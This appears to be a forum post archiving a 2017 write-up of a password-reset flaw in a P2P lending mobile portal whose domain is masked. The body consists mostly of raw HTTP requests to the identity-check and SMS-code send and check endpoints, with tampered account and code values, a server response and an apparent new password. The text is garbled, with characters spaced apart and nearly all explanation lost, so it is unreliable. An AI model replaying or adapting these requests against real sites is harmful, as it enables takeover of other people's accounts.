搜索

[20819] 2017-07-14_任意用户密码重置漏洞

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2017-07-14_任意用户密码重置漏洞 L e m o n S e c   2 0 1 7 - 0 7 - 1 4   h t t p s : / / m . x x x . c o m / p 2 p _ m o b i l e _ p o r t a l / i n d e x . p h p / s i t e / g e t V C o d e 访         使 P O S T   / p 2 p _ m o b i l e _ p o r t a l / i n d e x . p h p / l o g i n P a s s w o r d / v e r i f y I D   H T T P / 1 . 1 H o s t :   m . x x x . c o m A c c e p t :   * / * X - R e q u e s t e d - W i t h :   X M L H t t p R e q u e s t A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - c n C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d ;   c h a r s e t = U T F - 8 O r i g i n :   h t t p s : / / m . x x x . c o m C o n t e n t - L e n g t h :   4 6 C o n n e c t i o n :   c l o s e
U s e r - A g e n t :   M o z i l l a / 5 . 0   ( i P h o n e ;   C P U   i P h o n e   O S   9 _ 3 _ 4   l i k e   M a c   O S   X )   A p p l e W e b K i t / 6 0 1 . 1 . 4 6   ( K H T M L ,   l i k e   G e c k o )   M o b i l e / 1 3 G 3 5 R e f e r e r :   h t t p s : / / m . x x x . c o m / f o r g e t p a s s w o r d u s e r . h t m l C o o k i e :   P H P S E S S I D = a j d o e j g i b i s j m p 7 4 j 4 b k 4 s 4 4 2 1 u s e r n a m e = a d m i n 8 2 9 9 & m o b i l e = 1 2 3 4 & v e r i f y C o d e = s k e t   P S   使
8 8 8 8   P O S T   / p 2 p _ m o b i l e _ p o r t a l / i n d e x . p h p / S m s C o d e / S e n d   H T T P / 1 . 1 H o s t :   m . x x x . c o m A c c e p t :   * / * X - R e q u e s t e d - W i t h :   X M L H t t p R e q u e s t A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - c n C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d ;   c h a r s e t = U T F - 8
O r i g i n :   h t t p s : / / m . x x x . c o m C o n t e n t - L e n g t h :   4 2 C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0   ( i P h o n e ;   C P U   i P h o n e   O S   9 _ 3 _ 4   l i k e   M a c   O S   X )   A p p l e W e b K i t / 6 0 1 . 1 . 4 6   ( K H T M L ,   l i k e   G e c k o )   M o b i l e / 1 3 G 3 5 R e f e r e r :   h t t p s : / / m . x x x . c o m / f o r g e t p a s s w o r d p h o n e . h t m l C o o k i e :   P H P S E S S I D = f 6 b s b 0 q i l 9 5 b m v 8 n 1 v 1 8 c n 9 v p 1 u s e r I d = & m o b i l e = 1 3 8 8 8 8 8 8 8 8 8 & m o d u l e = 0 & t y p e = 1 便 便   P O S T   / p 2 p _ m o b i l e _ p o r t a l / i n d e x . p h p / S m s C o d e / C h e c k   H T T P / 1 . 1 H o s t :   m . x x x . c o m A c c e p t :   * / * X - R e q u e s t e d - W i t h :   X M L H t t p R e q u e s t A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - c n C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d ;   c h a r s e t = U T F - 8 O r i g i n :   h t t p s : / / m . x x x . c o m C o n t e n t - L e n g t h :   4 4 C o n n e c t i o n :   c l o s e U s e r - A g e n t :   M o z i l l a / 5 . 0   ( i P h o n e ;   C P U   i P h o n e   O S   9 _ 3 _ 4   l i k e   M a c   O S   X )   A p p l e W e b K i t / 6 0 1 . 1 . 4 6   ( K H T M L ,   l i k e   G e c k o )   M o b i l e / 1 3 G 3 5 R e f e r e r :   h t t p s : / / m . x x x . c o m / f o r g e t p a s s w o r d p h o n e . h t m l C o o k i e :   P H P S E S S I D = f 6 b s b 0 q i l 9 5 b m v 8 n 1 v 1 8 c n 9 v p 1 m o b i l e = 1 3 8 8 8 8 8 8 8 8 8 & c o d e = 1 2 3 4 5 6 & t y p e = 0 & m o d u l e = 0 { " r o w s " : [ ] , " r e s u l t S t a t u s " : 0 , " m s g " : " u 9 a 8 c u 8 b c 1 u 7 8 0 1 u 6 b 6 3 u 7 8 6 e " , " e r r o r e d " : f a l s e }
q w e r 1 1 2 2

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理